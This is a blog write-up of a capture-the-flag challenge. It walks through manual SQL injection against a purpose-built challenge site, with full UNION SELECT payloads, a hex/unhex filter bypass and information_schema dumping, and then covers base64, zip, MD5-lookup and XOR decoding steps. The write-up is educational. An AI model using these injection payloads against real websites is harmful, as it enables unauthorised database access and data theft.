Challenge info: (link to facebook post)

challenge info

This is a multistep challenge..

Step 1

Lets visit that link. We find a simple web page with a form

input field and “submit” button

Lets type anything and submit.. (I typed 0xbahaa)

message saying: “send the var as a POST request”

It tells us to send the “var” in a POST request. We notice our input (0xbahaa) in the GET parameter called “var”. lets copy it into POST.. I’ll use a firefox addon called “HTTP header live“.

“HTTP header live”

We’ll change method to POST and type our POST data down there

After sending the POST request with any data in “var”, we get a message saying “You got it”

“You got it”

But nothing happens.

Lets inspect the page source.

Page’s HTML code in Web developer tools (press F12)

There is some Javascript code, but for some reason it’s not being executed. Probably because of the plugin we’re using to send the request. Anyways, that code should do the following:

  • Show an alert saying: “Well done, Redirecting to next page”
  • Redirect to the next step in the challenge “../injection/index.php”

Lets navigate to the next step.

.

Step 2

The URL after redirection will be this:

hxxp://benmoussailyes13.000webhostapp.com/challenge/injection/index.php

Another input field and submit button

Again, another form.

If we type anything and click inject, we’ll get this:

After typing “0xbahaa” and clicking submit

The site is printing out the SQL-query used. It could be vulnerable to SQL-injection (SQLi).

Lets test it. I’ll give it a backslash ( \ ) so that we’ll escape the closing quote ( ‘ ), and that should give us an error if the site is vulnerable to SQLi. OR we could use a single quote ( ‘ ) too.

hxxp://benmoussailyes13.000webhostapp.com/challenge/injection/index.php?sub=\&submit=Inject

OR

hxxp://benmoussailyes13.000webhostapp.com/challenge/injection/index.php?sub=&submit=Inject

SQL injection detected

Nice! We broke the query. It means that we could inject SQL code here.

We could use tools to automate the SQLi process, but I’ll explain here briefly how to do it manually.

Before we start injecting and dumping data, lets make things a bit easier for us. I’ll use a firefox addon called hackbar to submit our payloads easily, instead of typing again and again in the addres bar, and firefox will encode some HTML stuff and confuse us. I also switched the places of the 2 GET parameters (“sub and “submit”, denoted by arrows below) so that we’ll type our payload in the end.

hxxp://benmoussailyes13.000webhostapp.com/challenge/injection/index.php?submit=Inject&sub=

Switched both parameters

First payload: ( “or 1”.. because or “1” is always True)

hxxp://benmoussailyes13.000webhostapp.com/challenge/injection/index.php?submit=Inject&sub=‘ or 1–+

(the –+ at the end here is to comment out any SQL code that comes after our query)

OR 1 ( or True)

Useful information is output to us 🤩

you will need to
retrieve inforamtions
from the . table
named ‘Solution’ where
the tag is ‘flag’

Save this information in the back of ur head for now.

Second payload: Lets find out the number of columns in this page.

We’ll use the halving method until we find the maximum number of columns that doesnt give an error.

  • hxxp://benmoussailyes13.000webhostapp.com/challenge/injection/index.php?submit=Inject&sub=’ order by 1–+ …. No error
  • hxxp://benmoussailyes13.000webhostapp.com/challenge/injection/index.php?submit=Inject&sub=’ order by 99999–+ …. Error
  • hxxp://benmoussailyes13.000webhostapp.com/challenge/injection/index.php?submit=Inject&sub=’ order by 50–+ …. Error
  • hxxp://benmoussailyes13.000webhostapp.com/challenge/injection/index.php?submit=Inject&sub=’ order by 25–+ …. Error
  • hxxp://benmoussailyes13.000webhostapp.com/challenge/injection/index.php?submit=Inject&sub=’ order by 12–+ …. Error
  • hxxp://benmoussailyes13.000webhostapp.com/challenge/injection/index.php?submit=Inject&sub=’ order by 6–+ …. Error
  • hxxp://benmoussailyes13.000webhostapp.com/challenge/injection/index.php?submit=Inject&sub=’ order by 3–+ …. Error
  • hxxp://benmoussailyes13.000webhostapp.com/challenge/injection/index.php?submit=Inject&sub=’ order by 2–+ …. No error

order by 1

order by 9999

order by 2

So we have 2 columns in this page, lets see which of them is displayed on the page. We’ll use UNION and then add our new select statement.

hxxp://benmoussailyes13.000webhostapp.com/challenge/injection/index.php?submit=Inject&sub=’ union select 1,2–+

Select 1,2.
Both columns appeared on screen

Both columns are displayed on the screen. Wonderful. Lets display some useful information in them..

hxxp://benmoussailyes13.000webhostapp.com/challenge/injection/index.php?submit=Inject&sub=’ union select concat(“version: “, version(), “<br>DB name: “, database(), “<br>user: “, user(), “<br>”),2–+

DB version, DB name, DB user

version: 10.1.31-MariaDB
DB name: id4490912_mysite
user: id4490912_ilyes@2a02:4780:bad:c0de::14

We have the DB name, DB user, and DB version. The most useful right now is the DB version, because dumping data from MySQL version < 5 is a bit different from newer versions.

Lets grab the list of table names from “information_schema” default database.. Remember, we’re looking for a table named “Solution”..

hxxp://benmoussailyes13.000webhostapp.com/challenge/injection/index.php?submit=Inject&sub=’ union select concat(table_name),2 from information_schema.tables–+

Select table_name is not working

Error.

Apparently there is some protection in place. Lets try the hex( ) function to bypass it..

hxxp://benmoussailyes13.000webhostapp.com/challenge/injection/index.php?submit=Inject&sub=’ union select concat(unhex(hex(table_name))),2 from information_schema.tables–+

OR

hxxp://benmoussailyes13.000webhostapp.com/challenge/injection/index.php?submit=Inject&sub=’ union select concat(unhex(hex(table_name))),‘<br>’ from information_schema.tables–+

for a better-formatted output.

List of tables’ names

It worked! We got the list of tables in all the databases of this website. You could spot the “Solution” table up there.

Using the same method, we grab the list of names of columns in the “Solution” table..

hxxp://benmoussailyes13.000webhostapp.com/challenge/injection/index.php?submit=Inject&sub=’ union select concat(unhex(hex(column_name))),'<br>’ from information_schema.columns WHERE table_name=’Solution’–+

tag
value

We dump the “tag” and “value” entries from the “Solution” table using this query:

hxxp://benmoussailyes13.000webhostapp.com/challenge/injection/index.php?submit=Inject&sub=’ union select concat(tag,’=====>’,value),'<br>’ from Solution–+

It should output “tag” ===> “value”.

“Tag” and “Value”

We get this big block of text. Lets copy it for inspection, and we conclude step 2 here.

flag=====>UEsDBBQDAAAIAFIAQ07bCrzQAQIAAH8CAAAJAAAAQnJ1dGUuemlwCvBmZjFmZmRIZji1xcmPAQhagXgGEPMwcDOk5iUXVRakpuhVZRYwzmRnYGJwdGXkYND9uOfRvsBpsw+ea+W4oKgiMldMWMAw1DJ4g2VaB8evvzblGfFtyRx+ksx1Dy9t/TavXP5zad4y5tNz3636uyPioJGJSki+To/Yjw1bJLcda5j3XbdqTXp57aSAKCWP3CUvzU577w2frfnqcK3/rDcAfVp+YHvvatZfHzhYc24cTmmYf3TvNsYXpgHNvw4iXC69C+LyF0Bsy8jAIAB0eUFlSUZ+XnwxyP0legWVSK6/wv46ZnEAh07OtBxe0xnpAY9UNSJO2fhNa0u7ul9sicob5yTG6ZcOT7R7nFWYYSx2ZFPCs58WT2Vrv0rMWTy1oHpPunHHzaRpGfN1sg9VVAEAoABf/yJwhlAS7Os/iDeCpZkgXWKsCAnA5DfszMKxCIlDwc7c4WsZO602qOHeX7TqbOTNh9lmqhH+hC39hhW99B/AZksFDbH5xXcLv25JdsxmL5ANSAXMwGCAptqQvt54KbvI5AFGE/BycGy9xLrsH00In4eLvIoZr+8RlHDrpdudjxixiKy42yTF4STJqxEKHCWF/5dQl1wCKeLPeYv+llBLAQKzZ8YduRCg0LClEUjhimqIIbjDGWHILiCNJ9QDvFnZQEqZgLAPSN9mBPEAUEsDBBQDAAAIAJi9Qk7lbo49qgAAAPEAAAAGAAAAcmVhZG1lRY5BDsIwDATvfcU+AFUI2jTiBzzDTV0SqU2q2FHF70ngwMnSesbrJ4QVhINEzpQXrClDfRCsYWNQXBBa9kqK05Mi1EmCvu+7dyoZKW5vSNqKhhQFVdSEORflpjmuQhfgKP7IzDvP3Cr+t4a6zuSUs2BL8XXpCLHsDbvghnIcnB0Jy/cdqsz5C/pOPWNfRngS37ofGBdjR0eWHbvJGjPNq7V8vQ/zYCY21w9QSwECPwMUAwAACABSAENO2wq80AECAAB/AgAACQAAAAAAAAAAACCAtIEAAAAAQnJ1dGUuemlwUEsBAj8DFAMAAAgAmL1CTuVujj2qAAAA8QAAAAYAAAAAAAAAAAAggLSBKAIAAHJlYWRtZVBLBQYAAAAAAgACAGsAAAD2AgAAAAA=

.

Step 3

The text we copied appears to be base64 encoded. Lets decode it using the python’s interpreter interactive mode.

Decoding base64 in python

That looks ugly. Lets write the decoded data into a file called “out.txt”.

write the decoded data into out.txt

If we look at it in a hex-editor, we’ll notice it has a PK magic bytes in its header. This indicates that it’s a zip file.

PK magic header

To make sure, we could use a tool like TRiD on windows or “file” command on linux.

TRiD detects a ZIP file in out.txt

Indeed it’s a zip file. Lets rename it to “out.zip” and extract it..

Contents of out.zip

We have 2 files inside.. “brute.zip” which is password protected. And “readme” which contains this text:

I set a password for this file and i forgot what it was …
your only solutions is to brute force it
i can only remeber that it was 4 caracters long,
a number , 2 uppercases and a lowercase.
the md5 hash is : 5d685ca8ecec78667bf88e034b467e60

We have 2 options now. We’ll first try to search online for the result of this hash on free hash checker websites (like md5online or hashkiller). If this option fails, we’ll have to bruteforce it. Bruteforcing wont take long since the password is only 4 chars long, and we already know what our custom wordlist will look like (doesnt include symbols or foreign alphabets, only English letters and numbers)..

Fortunately, the hash was found in hashkiller’s and md5online’s databases online

md5 hash found on HashKiller

Ad7U

Lets extract “brute.zip” with this password and go to step 4.

.

Step 4

Files inside brute.zip:

Contents of “brute.zip”

This python script “python_scrypt.py” looks pretty strange. Maybe it’s a distraction 🤔

python_scrypt.py

And the zip file “encryped.zip” isnt a valid zip file

encryped.zip is not a valid zip file

Lets first check the zip file in a hex editor to see if something is wrong with its zip file strucure.

encryped.zip in a hex editor

It doesnt have the PK magic bytes.🤔 One more thing is noticeable; the file has a lot of “EE” bytes.

encryped.zip has a lot of “EE” bytes

Any file (whether it be an EXE or ZIP or anything) usually has many Null bytes (hex 00) in it. This file doesnt have any null bytes!!!. it has “EE” bytes instead.

Those “EE” bytes could be the result of XORing the null bytes with “EE” (because EE ^ 00 = EE). That could be why we see many EE bytes and no Null bytes at all.

Lets use a simple python script to XOR each byte with EE, and write the new ouput to “aaa.zip”.

Link to the python script on my Github here

Contents of “aaa.zip”

Nice! It’s a valid zip file, with a file in it called “flag”.

the flag

That’s our flag.

.

I really enjoyed this challenge. Big thanks go to this challenge’s author and SalusLabs .

2 Comments

Von · April 25, 2019 at 12:50 am

I was able to find good info from your content.

    0xbahaa · April 26, 2019 at 3:17 am

    Thanks for the support, Von.
    Stay tuned for more 😎👌

Leave a Reply

Your email address will not be published. Required fields are marked *